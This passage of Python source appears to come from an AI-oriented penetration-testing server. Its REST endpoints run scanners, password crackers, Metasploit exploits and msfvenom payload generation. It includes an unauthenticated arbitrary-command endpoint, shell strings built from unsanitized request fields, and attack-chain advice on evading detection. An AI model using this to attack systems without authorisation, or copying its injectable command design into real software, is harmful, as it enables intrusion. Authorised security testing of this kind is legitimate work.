"objective": "Privilege Escalation", "vulnerability": priv_esc_vulns[0], "success_probability": 0.60 }) chain["overall_probability"] *= 0.60 # Find persistence persistence_vulns = self._find_vulnerabilities_by_pattern(base_software, "persistence") if persistence_vulns and len(chain["stages"]) < max_depth: chain["stages"].append({ "stage": 3, "objective": "Persistence", "vulnerability": persistence_vulns[0], "success_probability": 0.80 }) chain["overall_probability"] *= 0.80 chains.append(chain) return { "success": True, "target_software": target_software, "total_chains": len(chains), "attack_chains": chains, "recommendation": self._generate_chain_recommendations(chains) } except Exception as e: logger.error(f"Error finding attack chains: {str(e)}") return {"success": False, "error": str(e)} def _find_vulnerabilities_by_pattern(self, software, pattern_type): """Find vulnerabilities matching attack pattern""" # Simplified mock data - real implementation would query CVE database mock_vulnerabilities = [ { "cve_id": "CVE-2024-1234", "description": f"Remote code execution in {software}", "cvss_score": 9.8, "exploitability": "HIGH" }, { "cve_id": "CVE-2024-5678", "description": f"Privilege escalation in {software}", "cvss_score": 7.8, "exploitability": "MEDIUM" } ] return mock_vulnerabilities def _generate_chain_recommendations(self, chains): """Generate recommendations for attack chains""" if not chains: return "No viable attack chains found for target" recommendations = [ f"Found {len(chains)} potential attack chains", f"Highest probability chain: {max(chains, key=lambda x: x['overall_probability'])['overall_probability']:.2%}", "Recommendations:", "- Test chains in order of probability", "- Prepare fallback methods for each stage", "- Consider detection evasion at each stage" ] return "\n".join(recommendations) # Global intelligence managers cve_intelligence = CVEIntelligenceManager() exploit_generator = AIExploitGenerator() vulnerability_correlator = VulnerabilityCorrelator() def execute_command(command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute a shell command with enhanced features Args: command: The command to execute use_cache: Whether to use caching for this command Returns: A dictionary containing the stdout, stderr, return code, and metadata """ # Check cache first if use_cache: cached_result = cache.get(command, {}) if cached_result: return cached_result # Execute command executor = EnhancedCommandExecutor(command) result = executor.execute() # Cache successful results if use_cache and result.get("success", False): cache.set(command, {}, result) return result # File Operations Manager class FileOperationsManager: """Handle file operations with security and validation""" def __init__(self, base_dir: str = "/tmp/hexstrike_files"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) self.max_file_size = 100 * 1024 * 1024 # 100MB def create_file(self, filename: str, content: str, binary: bool = False) -> Dict[str, Any]: """Create a file with the specified content""" try: file_path = self.base_dir / filename file_path.parent.mkdir(parents=True, exist_ok=True) if len(content.encode()) > self.max_file_size: return {"success": False, "error": f"File size exceeds {self.max_file_size} bytes"} mode = "wb" if binary else "w" with open(file_path, mode) as f: if binary: f.write(content.encode() if isinstance(content, str) else content) else: f.write(content) logger.info(f"πŸ“„ Created file: {filename} ({len(content)} bytes)") return {"success": True, "path": str(file_path), "size": len(content)} except Exception as e: logger.error(f"❌ Error creating file {filename}: {e}") return {"success": False, "error": str(e)} def modify_file(self, filename: str, content: str, append: bool = False) -> Dict[str, Any]: """Modify an existing file""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} mode = "a" if append else "w" with open(file_path, mode) as f: f.write(content) logger.info(f"✏️ Modified file: {filename}") return {"success": True, "path": str(file_path)} except Exception as e: logger.error(f"❌ Error modifying file {filename}: {e}") return {"success": False, "error": str(e)} def delete_file(self, filename: str) -> Dict[str, Any]: """Delete a file or directory""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} if file_path.is_dir(): shutil.rmtree(file_path) else: file_path.unlink() logger.info(f"πŸ—‘οΈ Deleted: {filename}") return {"success": True} except Exception as e: logger.error(f"❌ Error deleting {filename}: {e}") return {"success": False, "error": str(e)} def list_files(self, directory: str = ".") -> Dict[str, Any]: """List files in a directory""" try: dir_path = self.base_dir / directory if not dir_path.exists(): return {"success": False, "error": "Directory does not exist"} files = [] for item in dir_path.iterdir(): files.append({ "name": item.name, "type": "directory" if item.is_dir() else "file", "size": item.stat().st_size if item.is_file() else 0, "modified": datetime.fromtimestamp(item.stat().st_mtime).isoformat() }) return {"success": True, "files": files} except Exception as e: logger.error(f"❌ Error listing files in {directory}: {e}") return {"success": False, "error": str(e)} # Global file operations manager file_manager = FileOperationsManager() # API Routes @app.route("/health", methods=["GET"]) def health_check(): """Enhanced health check endpoint with telemetry""" essential_tools = ["nmap", "gobuster", "dirb", "nikto", "sqlmap", "hydra", "john"] cloud_tools = ["prowler", "scout2", "trivy", "kube-hunter", "cloudsploit"] advanced_tools = [ "ffuf", "nuclei", "nxc", "amass", "hashcat", "subfinder", "smbmap", "volatility", "msfvenom", "msfconsole", "enum4linux", "wpscan", "burpsuite", "zaproxy" ] all_tools = essential_tools + cloud_tools + advanced_tools tools_status = {} for tool in all_tools: try: result = execute_command(f"which {tool}", use_cache=True) tools_status[tool] = result["success"] except: tools_status[tool] = False all_essential_tools_available = all(tools_status[tool] for tool in essential_tools) return jsonify({ "status": "healthy", "message": "HexStrike AI Tools API Server is operational", "version": "5.0.0", "tools_status": tools_status, "all_essential_tools_available": all_essential_tools_available, "total_tools_available": sum(1 for tool, available in tools_status.items() if available), "total_tools_count": len(all_tools), "cache_stats": cache.get_stats(), "telemetry": telemetry.get_stats(), "uptime": time.time() - telemetry.stats["start_time"] }) @app.route("/api/command", methods=["POST"]) def generic_command(): """Execute any command provided in the request with enhanced logging""" try: params = request.json command = params.get("command", "") use_cache = params.get("use_cache", True) if not command: logger.warning("⚠️ Command endpoint called without command parameter") return jsonify({ "error": "Command parameter is required" }), 400 result = execute_command(command, use_cache=use_cache) return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in command endpoint: {str(e)}") logger.error(traceback.format_exc()) return jsonify({ "error": f"Server error: {str(e)}" }), 500 # File Operations API Endpoints @app.route("/api/files/create", methods=["POST"]) def create_file(): """Create a new file""" try: params = request.json filename = params.get("filename", "") content = params.get("content", "") binary = params.get("binary", False) if not filename: return jsonify({"error": "Filename is required"}), 400 result = file_manager.create_file(filename, content, binary) return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error creating file: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/files/modify", methods=["POST"]) def modify_file(): """Modify an existing file""" try: params = request.json filename = params.get("filename", "") content = params.get("content", "") append = params.get("append", False) if not filename: return jsonify({"error": "Filename is required"}), 400 result = file_manager.modify_file(filename, content, append) return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error modifying file: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/files/delete", methods=["DELETE"]) def delete_file(): """Delete a file or directory""" try: params = request.json filename = params.get("filename", "") if not filename: return jsonify({"error": "Filename is required"}), 400 result = file_manager.delete_file(filename) return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error deleting file: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/files/list", methods=["GET"]) def list_files(): """List files in a directory""" try: directory = request.args.get("directory", ".") result = file_manager.list_files(directory) return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error listing files: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 # Payload Generation Endpoint @app.route("/api/payloads/generate", methods=["POST"]) def generate_payload(): """Generate large payloads for testing""" try: params = request.json payload_type = params.get("type", "buffer") size = params.get("size", 1024) pattern = params.get("pattern", "A") filename = params.get("filename", f"payload_{int(time.time())}") if size > 100 * 1024 * 1024: # 100MB limit return jsonify({"error": "Payload size too large (max 100MB)"}), 400 if payload_type == "buffer": content = pattern * (size // len(pattern)) elif payload_type == "cyclic": # Generate cyclic pattern alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" content = "" for i in range(size): content += alphabet[i % len(alphabet)] elif payload_type == "random": import random import string content = ''.join(random.choices(string.ascii_letters + string.digits, k=size)) else: return jsonify({"error": "Invalid payload type"}), 400 result = file_manager.create_file(filename, content) result["payload_info"] = { "type": payload_type, "size": size, "pattern": pattern } logger.info(f"🎯 Generated {payload_type} payload: {filename} ({size} bytes)") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error generating payload: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 # Cache Management Endpoint @app.route("/api/cache/stats", methods=["GET"]) def cache_stats(): """Get cache statistics""" return jsonify(cache.get_stats()) @app.route("/api/cache/clear", methods=["POST"]) def clear_cache(): """Clear the cache""" cache.cache.clear() cache.stats = {"hits": 0, "misses": 0, "evictions": 0} logger.info("🧹 Cache cleared") return jsonify({"success": True, "message": "Cache cleared"}) # Telemetry Endpoint @app.route("/api/telemetry", methods=["GET"]) def get_telemetry(): """Get system telemetry""" return jsonify(telemetry.get_stats()) # ============================================================================ # PROCESS MANAGEMENT API ENDPOINTS (v5.0 ENHANCEMENT) # ============================================================================ @app.route("/api/processes/list", methods=["GET"]) def list_processes(): """List all active processes""" try: processes = ProcessManager.list_active_processes() # Add calculated fields for each process for pid, info in processes.items(): runtime = time.time() - info["start_time"] info["runtime_formatted"] = f"{runtime:.1f}s" if info["progress"] > 0: eta = (runtime / info["progress"]) * (1.0 - info["progress"]) info["eta_formatted"] = f"{eta:.1f}s" else: info["eta_formatted"] = "Unknown" return jsonify({ "success": True, "active_processes": processes, "total_count": len(processes) }) except Exception as e: logger.error(f"πŸ’₯ Error listing processes: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/processes/status/", methods=["GET"]) def get_process_status(pid): """Get status of a specific process""" try: process_info = ProcessManager.get_process_status(pid) if process_info: # Add calculated fields runtime = time.time() - process_info["start_time"] process_info["runtime_formatted"] = f"{runtime:.1f}s" if process_info["progress"] > 0: eta = (runtime / process_info["progress"]) * (1.0 - process_info["progress"]) process_info["eta_formatted"] = f"{eta:.1f}s" else: process_info["eta_formatted"] = "Unknown" return jsonify({ "success": True, "process": process_info }) else: return jsonify({ "success": False, "error": f"Process {pid} not found" }), 404 except Exception as e: logger.error(f"πŸ’₯ Error getting process status: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/processes/terminate/", methods=["POST"]) def terminate_process(pid): """Terminate a specific process""" try: success = ProcessManager.terminate_process(pid) if success: logger.info(f"πŸ›‘ Process {pid} terminated successfully") return jsonify({ "success": True, "message": f"Process {pid} terminated successfully" }) else: return jsonify({ "success": False, "error": f"Failed to terminate process {pid} or process not found" }), 404 except Exception as e: logger.error(f"πŸ’₯ Error terminating process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/processes/pause/", methods=["POST"]) def pause_process(pid): """Pause a specific process""" try: success = ProcessManager.pause_process(pid) if success: logger.info(f"⏸️ Process {pid} paused successfully") return jsonify({ "success": True, "message": f"Process {pid} paused successfully" }) else: return jsonify({ "success": False, "error": f"Failed to pause process {pid} or process not found" }), 404 except Exception as e: logger.error(f"πŸ’₯ Error pausing process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/processes/resume/", methods=["POST"]) def resume_process(pid): """Resume a paused process""" try: success = ProcessManager.resume_process(pid) if success: logger.info(f"▢️ Process {pid} resumed successfully") return jsonify({ "success": True, "message": f"Process {pid} resumed successfully" }) else: return jsonify({ "success": False, "error": f"Failed to resume process {pid} or process not found" }), 404 except Exception as e: logger.error(f"πŸ’₯ Error resuming process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @app.route("/api/processes/dashboard", methods=["GET"]) def process_dashboard(): """Get enhanced process dashboard with visual status""" try: processes = ProcessManager.list_active_processes() current_time = time.time() dashboard = { "timestamp": datetime.now().isoformat(), "total_processes": len(processes), "processes": [], "system_load": { "cpu_percent": psutil.cpu_percent(interval=1), "memory_percent": psutil.virtual_memory().percent, "active_connections": len(psutil.net_connections()) } } for pid, info in processes.items(): runtime = current_time - info["start_time"] progress_percent = info.get("progress", 0) * 100 # Create visual progress bar bar_length = 20 filled_length = int(bar_length * progress_percent / 100) progress_bar = 'β–ˆ' * filled_length + 'β–‘' * (bar_length - filled_length) # Calculate ETA if progress_percent > 5: eta = ((runtime / progress_percent) * 100) - runtime eta_str = f"{eta:.0f}s" else: eta_str = "Calculating..." process_status = { "pid": pid, "command": info["command"][:60] + "..." if len(info["command"]) > 60 else info["command"], "status": info["status"], "runtime": f"{runtime:.1f}s", "progress_percent": f"{progress_percent:.1f}%", "progress_bar": progress_bar, "eta": eta_str, "bytes_processed": info.get("bytes_processed", 0), "last_output": info.get("last_output", "")[:100] } dashboard["processes"].append(process_status) return jsonify(dashboard) except Exception as e: logger.error(f"πŸ’₯ Error getting process dashboard: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 # ============================================================================ # SECURITY TOOLS API ENDPOINTS # ============================================================================ @app.route("/api/tools/nmap", methods=["POST"]) def nmap(): """Execute nmap scan with enhanced logging and caching""" try: params = request.json target = params.get("target", "") scan_type = params.get("scan_type", "-sCV") ports = params.get("ports", "") additional_args = params.get("additional_args", "-T4 -Pn") if not target: logger.warning("🎯 Nmap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"nmap {scan_type}" if ports: command += f" -p {ports}" if additional_args: command += f" {additional_args}" command += f" {target}" logger.info(f"πŸ” Starting Nmap scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š Nmap scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in nmap endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/gobuster", methods=["POST"]) def gobuster(): """Execute gobuster with enhanced logging""" try: params = request.json url = params.get("url", "") mode = params.get("mode", "dir") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 Gobuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 # Validate mode if mode not in ["dir", "dns", "fuzz", "vhost"]: logger.warning(f"❌ Invalid gobuster mode: {mode}") return jsonify({ "error": f"Invalid mode: {mode}. Must be one of: dir, dns, fuzz, vhost" }), 400 command = f"gobuster {mode} -u {url} -w {wordlist}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ“ Starting Gobuster {mode} scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š Gobuster scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in gobuster endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/nuclei", methods=["POST"]) def nuclei(): """Execute Nuclei vulnerability scanner with enhanced logging""" try: params = request.json target = params.get("target", "") severity = params.get("severity", "") tags = params.get("tags", "") template = params.get("template", "") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 Nuclei called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"nuclei -u {target}" if severity: command += f" -severity {severity}" if tags: command += f" -tags {tags}" if template: command += f" -t {template}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ”¬ Starting Nuclei vulnerability scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š Nuclei scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in nuclei endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # CLOUD SECURITY TOOLS # ============================================================================ @app.route("/api/tools/prowler", methods=["POST"]) def prowler(): """Execute Prowler for AWS security assessment""" try: params = request.json provider = params.get("provider", "aws") profile = params.get("profile", "default") region = params.get("region", "") checks = params.get("checks", "") output_dir = params.get("output_dir", "/tmp/prowler_output") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) command = f"prowler {provider}" if profile: command += f" --profile {profile}" if region: command += f" --region {region}" if checks: command += f" --checks {checks}" command += f" --output-directory {output_dir}" command += f" --output-format {output_format}" if additional_args: command += f" {additional_args}" logger.info(f"☁️ Starting Prowler {provider} security assessment") result = execute_command(command) result["output_directory"] = output_dir logger.info(f"πŸ“Š Prowler assessment completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in prowler endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/trivy", methods=["POST"]) def trivy(): """Execute Trivy for container/filesystem vulnerability scanning""" try: params = request.json scan_type = params.get("scan_type", "image") # image, fs, repo target = params.get("target", "") output_format = params.get("output_format", "json") severity = params.get("severity", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 Trivy called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"trivy {scan_type} {target}" if output_format: command += f" --format {output_format}" if severity: command += f" --severity {severity}" if output_file: command += f" --output {output_file}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Trivy {scan_type} scan: {target}") result = execute_command(command) if output_file: result["output_file"] = output_file logger.info(f"πŸ“Š Trivy scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in trivy endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/dirb", methods=["POST"]) def dirb(): """Execute dirb with enhanced logging""" try: params = request.json url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 Dirb called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"dirb {url} {wordlist}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ“ Starting Dirb scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š Dirb scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in dirb endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/nikto", methods=["POST"]) def nikto(): """Execute nikto with enhanced logging""" try: params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 Nikto called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"nikto -h {target}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ”¬ Starting Nikto scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š Nikto scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in nikto endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/sqlmap", methods=["POST"]) def sqlmap(): """Execute sqlmap with enhanced logging""" try: params = request.json url = params.get("url", "") data = params.get("data", "") additional_args = params.get("additional_args", "") if not url: logger.warning("🎯 SQLMap called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"sqlmap -u {url} --batch" if data: command += f" --data=\"{data}\"" if additional_args: command += f" {additional_args}" logger.info(f"πŸ’‰ Starting SQLMap scan: {url}") result = execute_command(command) logger.info(f"πŸ“Š SQLMap scan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in sqlmap endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/metasploit", methods=["POST"]) def metasploit(): """Execute metasploit module with enhanced logging""" try: params = request.json module = params.get("module", "") options = params.get("options", {}) if not module: logger.warning("πŸš€ Metasploit called without module parameter") return jsonify({ "error": "Module parameter is required" }), 400 # Create an MSF resource script resource_content = f"use {module}\n" for key, value in options.items(): resource_content += f"set {key} {value}\n" resource_content += "exploit\n" # Save resource script to a temporary file resource_file = "/tmp/mcp_msf_resource.rc" with open(resource_file, "w") as f: f.write(resource_content) command = f"msfconsole -q -r {resource_file}" logger.info(f"πŸš€ Starting Metasploit module: {module}") result = execute_command(command) # Clean up the temporary file try: os.remove(resource_file) except Exception as e: logger.warning(f"Error removing temporary resource file: {str(e)}") logger.info(f"πŸ“Š Metasploit module completed: {module}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in metasploit endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/hydra", methods=["POST"]) def hydra(): """Execute hydra with enhanced logging""" try: params = request.json target = params.get("target", "") service = params.get("service", "") username = params.get("username", "") username_file = params.get("username_file", "") password = params.get("password", "") password_file = params.get("password_file", "") additional_args = params.get("additional_args", "") if not target or not service: logger.warning("🎯 Hydra called without target or service parameter") return jsonify({ "error": "Target and service parameters are required" }), 400 if not (username or username_file) or not (password or password_file): logger.warning("πŸ”‘ Hydra called without username/password parameters") return jsonify({ "error": "Username/username_file and password/password_file are required" }), 400 command = f"hydra -t 4" if username: command += f" -l {username}" elif username_file: command += f" -L {username_file}" if password: command += f" -p {password}" elif password_file: command += f" -P {password_file}" if additional_args: command += f" {additional_args}" command += f" {target} {service}" logger.info(f"πŸ”‘ Starting Hydra attack: {target}:{service}") result = execute_command(command) logger.info(f"πŸ“Š Hydra attack completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in hydra endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/john", methods=["POST"]) def john(): """Execute john with enhanced logging""" try: params = request.json hash_file = params.get("hash_file", "") wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") format_type = params.get("format", "") additional_args = params.get("additional_args", "") if not hash_file: logger.warning("πŸ” John called without hash_file parameter") return jsonify({ "error": "Hash file parameter is required" }), 400 command = f"john" if format_type: command += f" --format={format_type}" if wordlist: command += f" --wordlist={wordlist}" if additional_args: command += f" {additional_args}" command += f" {hash_file}" logger.info(f"πŸ” Starting John the Ripper: {hash_file}") result = execute_command(command) logger.info(f"πŸ“Š John the Ripper completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in john endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/wpscan", methods=["POST"]) def wpscan(): """Execute wpscan with enhanced logging""" try: params = request.json url = params.get("url", "") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 WPScan called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"wpscan --url {url}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting WPScan: {url}") result = execute_command(command) logger.info(f"πŸ“Š WPScan completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in wpscan endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/enum4linux", methods=["POST"]) def enum4linux(): """Execute enum4linux with enhanced logging""" try: params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "-a") if not target: logger.warning("🎯 Enum4linux called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"enum4linux {additional_args} {target}" logger.info(f"πŸ” Starting Enum4linux: {target}") result = execute_command(command) logger.info(f"πŸ“Š Enum4linux completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in enum4linux endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/ffuf", methods=["POST"]) def ffuf(): """Execute FFuf web fuzzer with enhanced logging""" try: params = request.json url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") mode = params.get("mode", "directory") match_codes = params.get("match_codes", "200,204,301,302,307,401,403") additional_args = params.get("additional_args", "") if not url: logger.warning("🌐 FFuf called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"ffuf" if mode == "directory": command += f" -u {url}/FUZZ -w {wordlist}" elif mode == "vhost": command += f" -u {url} -H 'Host: FUZZ' -w {wordlist}" elif mode == "parameter": command += f" -u {url}?FUZZ=value -w {wordlist}" else: command += f" -u {url} -w {wordlist}" command += f" -mc {match_codes}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting FFuf {mode} fuzzing: {url}") result = execute_command(command) logger.info(f"πŸ“Š FFuf fuzzing completed for {url}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in ffuf endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/netexec", methods=["POST"]) def netexec(): """Execute NetExec (formerly CrackMapExec) with enhanced logging""" try: params = request.json target = params.get("target", "") protocol = params.get("protocol", "smb") username = params.get("username", "") password = params.get("password", "") hash_value = params.get("hash", "") module = params.get("module", "") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 NetExec called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"nxc {protocol} {target}" if username: command += f" -u {username}" if password: command += f" -p {password}" if hash_value: command += f" -H {hash_value}" if module: command += f" -M {module}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting NetExec {protocol} scan: {target}") result = execute_command(command) logger.info(f"πŸ“Š NetExec scan completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in netexec endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/amass", methods=["POST"]) def amass(): """Execute Amass for subdomain enumeration with enhanced logging""" try: params = request.json domain = params.get("domain", "") mode = params.get("mode", "enum") additional_args = params.get("additional_args", "") if not domain: logger.warning("🌐 Amass called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 command = f"amass {mode}" if mode == "enum": command += f" -d {domain}" else: command += f" -d {domain}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Amass {mode}: {domain}") result = execute_command(command) logger.info(f"πŸ“Š Amass completed for {domain}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in amass endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/hashcat", methods=["POST"]) def hashcat(): """Execute Hashcat for password cracking with enhanced logging""" try: params = request.json hash_file = params.get("hash_file", "") hash_type = params.get("hash_type", "") attack_mode = params.get("attack_mode", "0") wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") mask = params.get("mask", "") additional_args = params.get("additional_args", "") if not hash_file: logger.warning("πŸ” Hashcat called without hash_file parameter") return jsonify({ "error": "Hash file parameter is required" }), 400 if not hash_type: logger.warning("πŸ” Hashcat called without hash_type parameter") return jsonify({ "error": "Hash type parameter is required" }), 400 command = f"hashcat -m {hash_type} -a {attack_mode} {hash_file}" if attack_mode == "0" and wordlist: command += f" {wordlist}" elif attack_mode == "3" and mask: command += f" {mask}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Hashcat attack: mode {attack_mode}") result = execute_command(command) logger.info(f"πŸ“Š Hashcat attack completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in hashcat endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/subfinder", methods=["POST"]) def subfinder(): """Execute Subfinder for passive subdomain enumeration with enhanced logging""" try: params = request.json domain = params.get("domain", "") silent = params.get("silent", True) all_sources = params.get("all_sources", False) additional_args = params.get("additional_args", "") if not domain: logger.warning("🌐 Subfinder called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 command = f"subfinder -d {domain}" if silent: command += " -silent" if all_sources: command += " -all" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting Subfinder: {domain}") result = execute_command(command) logger.info(f"πŸ“Š Subfinder completed for {domain}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in subfinder endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/smbmap", methods=["POST"]) def smbmap(): """Execute SMBMap for SMB share enumeration with enhanced logging""" try: params = request.json target = params.get("target", "") username = params.get("username", "") password = params.get("password", "") domain = params.get("domain", "") additional_args = params.get("additional_args", "") if not target: logger.warning("🎯 SMBMap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 command = f"smbmap -H {target}" if username: command += f" -u {username}" if password: command += f" -p {password}" if domain: command += f" -d {domain}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting SMBMap: {target}") result = execute_command(command) logger.info(f"πŸ“Š SMBMap completed for {target}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in smbmap endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/volatility", methods=["POST"]) def volatility(): """Execute Volatility for memory forensics with enhanced logging""" try: params = request.json memory_file = params.get("memory_file", "") plugin = params.get("plugin", "") profile = params.get("profile", "") additional_args = params.get("additional_args", "") if not memory_file: logger.warning("🧠 Volatility called without memory_file parameter") return jsonify({ "error": "Memory file parameter is required" }), 400 if not plugin: logger.warning("🧠 Volatility called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 command = f"volatility -f {memory_file}" if profile: command += f" --profile={profile}" command += f" {plugin}" if additional_args: command += f" {additional_args}" logger.info(f"🧠 Starting Volatility analysis: {plugin}") result = execute_command(command) logger.info(f"πŸ“Š Volatility analysis completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in volatility endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/msfvenom", methods=["POST"]) def msfvenom(): """Execute MSFVenom to generate payloads with enhanced logging""" try: params = request.json payload = params.get("payload", "") format_type = params.get("format", "") output_file = params.get("output_file", "") encoder = params.get("encoder", "") iterations = params.get("iterations", "") additional_args = params.get("additional_args", "") if not payload: logger.warning("πŸš€ MSFVenom called without payload parameter") return jsonify({ "error": "Payload parameter is required" }), 400 command = f"msfvenom -p {payload}" if format_type: command += f" -f {format_type}" if output_file: command += f" -o {output_file}" if encoder: command += f" -e {encoder}" if iterations: command += f" -i {iterations}" if additional_args: command += f" {additional_args}" logger.info(f"πŸš€ Starting MSFVenom payload generation: {payload}") result = execute_command(command) logger.info(f"πŸ“Š MSFVenom payload generated") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in msfvenom endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # BINARY 